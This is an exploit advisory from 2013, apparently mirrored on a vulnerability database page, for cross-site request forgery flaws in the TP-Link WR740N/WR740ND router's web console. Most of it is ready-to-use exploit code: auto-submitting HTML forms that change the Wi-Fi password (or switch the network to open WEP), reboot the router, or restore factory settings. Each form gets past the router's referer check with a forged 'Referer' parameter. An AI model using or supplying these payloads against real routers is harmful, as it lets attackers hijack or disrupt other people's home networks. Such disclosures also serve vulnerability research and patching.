TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1065331 漏洞类型
发布时间 2013-11-25 更新时间 2013-11-25
漏洞平台 Hardware CVSS评分 N/A
# Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities
# Date: 11/24/2013
# Author: SaMaN( @samanL33T )
# Vendor Homepage:
# Category: Hardware/Wireless Router
# Firmware Version: 3.16.6 Build 130529 Rel.47286n and below
# Tested on: WR740N/WR740ND (May be possible on other models)
Technical Details
TPLINK WIreless Router WR740N has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router,Change Settings by simply making the user visit a CSRF link.

Application uses "HTTP-REFERER" check functionality to check for CSRF attacks. But it can easily be bypassed using the "Referer" parameter with value set to target's I.P in the GET request.

Exploit Code 

Change WPA/WPA2 password by CSRF

<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/WlanSecurityRpm.htm"
method="GET" name="form">
<input type="hidden" name="secType" value="3">
<input type="hidden" name="pskSecOpt" value="3">
<input type="hidden" name="pskCipher" value="3">
<input type="hidden" name="pskSecret" value="[WPA/WPA2_PASSWORD]">
<input type="hidden" name="interval" value="0">
<input type="hidden" name="wpaSecOpt" value="3">
<input type="hidden" name="wpaCipher" value="1">
<input type="hidden" name="radiusIP" value="">
<input type="hidden" name="rediusPort" value="1812">
<input type="hidden" name="radiusSecret" value="">
<input type="hidden" name="IntervalWpa" value="0">
<input type="hidden" name="webSecOpt" value="1">
<input type="hidden" name="keytype" value="1">
<input type="hidden" name="keynum" value="1">
<input type="hidden" name="key1" value="">
<input type="hidden" name="length1" value="0">
<input type="hidden" name="key2" value="">
<input type="hidden" name="length2" value="0">
<input type="hidden" name="key3" value="">
<input type="hidden" name="length3" value="0">
<input type="hidden" name="key4" value="">
<input type="hidden" name="length4" value="0">
<input type="hidden" name="Save" value="Save">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">

#For Changing the Security to Open WEP, simply change "secType" value to 1.

Reboot Router by CSRF

<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/SysRebootRpm.htm"
method="GET" name="form">
<input type="hidden" name="Reboot" value="Reboot">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">

Factory Reset the Router

<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/RestoreDefaultCfgRpm.htm"
method="GET" name="form">
<input type="hidden" name="Restorefactory" value="Restore">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">

twitter : @samanL33T <>